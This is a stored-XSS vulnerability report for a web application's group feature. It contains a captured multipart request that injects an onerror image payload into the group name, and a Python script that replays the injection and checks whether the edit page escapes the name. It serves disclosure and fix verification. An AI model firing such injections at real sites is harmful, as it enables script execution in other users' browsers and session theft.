Description
Stored XSS in the group name. The injected script runs whenever a group administrator edits a post in that group, and it can also be triggered directly by visiting the topicedit URL for any post in the group, because the group name is rendered on that page without HTML output encoding.
Steps to reproduce:
1 admin1 creates a new group with the following request. Note that the malicious code has been injected into the groupname parameter (the Cookie value is omitted here).
POST /index.php?app=group&ac=create&ts=do HTTP/1.1
Host: yourdomain
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------159522762613371
Content-Length: 685
Cookie:
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------159522762613371
Content-Disposition: form-data; name="groupname"
`<img src=1 onerror=alert(1)>`
-----------------------------159522762613371
Content-Disposition: form-data; name="groupdesc"
aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------159522762613371
Content-Disposition: form-data; name="tag"
aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="token"
99dc80d60a3284e86a8eef06c28a932f5614d29a
-----------------------------159522762613371--
2 admin1 invites admin2 as an administrator of this new group and posts anything. Note: inviting someone as a group administrator does not require their consent, so admin1 can make any user an administrator of the group without their agreement.
3 Once admin2 edits any post in this group, or simply visits http://yourdomain/thinknew/index.php?app=group&ac=topicedit&topicid={your_topic_id, which is easy to obtain}, the JavaScript injected into the group name executes in admin2's browser. Because the trigger is a plain GET request, the token in the creation form does not protect the victim here.
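The following Python script is an added example written for this page, not the application's own code or the reporter's tooling. It rebuilds step 1 (the multipart group-creation request) and the check in step 3 (fetching the topicedit page) and includes an offline oracle that decides whether a rendered page contains the group name unescaped, escaped, or not at all, which is also how to verify a fix. The endpoint paths, field names, payload and boundary are taken from the captured request above; the base URL, session cookies, CSRF token and topic id are placeholders supplied on the command line, and the two sample pages are constructed for the offline check.

```python
"""Reproduction helper for the stored XSS in the group name (example code).

Endpoints, field names and boundary come from the captured request in the
report. Host, cookies, token and topic id are assumptions passed as arguments.
"""
import html
import http.client
import sys
from urllib.parse import urlparse

PAYLOAD = '<img src=1 onerror=alert(1)>'                  # injected group name from the report
BOUNDARY = '---------------------------159522762613371'   # boundary used in the captured request
CREATE_PATH = '/index.php?app=group&ac=create&ts=do'
EDIT_PATH = '/index.php?app=group&ac=topicedit&topicid='

# Constructed sample renderings of a topicedit page, used to exercise the oracle offline.
VULNERABLE_PAGE = '<h2>Group: <img src=1 onerror=alert(1)></h2>'        # constructed
FIXED_PAGE = '<h2>Group: &lt;img src=1 onerror=alert(1)&gt;</h2>'       # constructed


def create_group_parts(groupname, token, groupdesc='aaaaaaaaaaaaaaa', tag='aaaaaaaaaaaaaaa'):
    """Form parts of step 1, in the order of the captured request.
    None marks the empty 'photo' file part the browser sends when no file is chosen."""
    return [('groupname', groupname), ('groupdesc', groupdesc), ('photo', None),
            ('tag', tag), ('token', token)]


def encode_multipart(parts, boundary=BOUNDARY):
    """Encode (name, value) parts as a multipart/form-data body with CRLF line ends,
    in the same layout as the captured request."""
    lines = []
    for name, value in parts:
        lines.append('--' + boundary)
        if value is None:  # empty file part: headers, blank line, empty body
            lines.append('Content-Disposition: form-data; name="%s"; filename=""' % name)
            lines.append('Content-Type: application/octet-stream')
            lines.append('')
            lines.append('')
        else:
            lines.append('Content-Disposition: form-data; name="%s"' % name)
            lines.append('')
            lines.append(value)
    lines.append('--' + boundary + '--')
    lines.append('')
    return '\r\n'.join(lines).encode('utf-8')


def reflection_state(page, payload=PAYLOAD):
    """Classify how a page reflects the group name.

    'unescaped': the raw payload is present, so no output encoding was applied
                 (whether it fires also depends on the surrounding HTML context);
    'escaped'  : only the entity-encoded form is present, as htmlspecialchars()
                 or html.escape() would produce; this is what a fix should yield;
    'absent'   : the group name is not on the page at all.
    """
    if payload in page:
        return 'unescaped'
    if html.escape(payload) in page:
        return 'escaped'
    return 'absent'


def _request(base_url, method, path, cookie, body=None, headers=None):
    """Minimal stdlib HTTP call; base_url may carry a path prefix such as /thinknew."""
    u = urlparse(base_url)
    cls = http.client.HTTPSConnection if u.scheme == 'https' else http.client.HTTPConnection
    conn = cls(u.netloc, timeout=15)
    hdrs = {'Cookie': cookie, 'User-Agent': 'Mozilla/5.0'}
    hdrs.update(headers or {})
    conn.request(method, u.path.rstrip('/') + path, body=body, headers=hdrs)
    resp = conn.getresponse()
    return resp.status, resp.read().decode('utf-8', 'replace')


def post_create_group(base_url, cookie, token, groupname=PAYLOAD):
    """Step 1: create the group whose name carries the payload (as admin1)."""
    body = encode_multipart(create_group_parts(groupname, token))
    headers = {'Content-Type': 'multipart/form-data; boundary=' + BOUNDARY,
               'Content-Length': str(len(body))}
    return _request(base_url, 'POST', CREATE_PATH, cookie, body, headers)


def check_topic_edit(base_url, cookie, topicid):
    """Step 3: fetch the topicedit page (as admin2) and report how the name is rendered."""
    status, page = _request(base_url, 'GET', EDIT_PATH + str(topicid), cookie)
    return status, reflection_state(page)


if __name__ == '__main__':
    if len(sys.argv) != 6:
        sys.exit('usage: repro.py BASE_URL ADMIN1_COOKIE ADMIN1_TOKEN ADMIN2_COOKIE TOPIC_ID')
    base, cookie1, token, cookie2, topic = sys.argv[1:]
    print('create group:', post_create_group(base, cookie1, token)[0])
    # Step 2 (invite admin2 and post a topic) is done in the UI before the check below.
    print('topicedit renders group name:', check_topic_edit(base, cookie2, topic))
```

Run it with the base URL (for example http://yourdomain/thinknew), admin1's session cookie and form token, admin2's session cookie, and the topic id. A patched build is confirmed when check_topic_edit reports 'escaped' rather than 'unescaped'; 'absent' usually means the session cookie or topic id was wrong rather than that the page is safe.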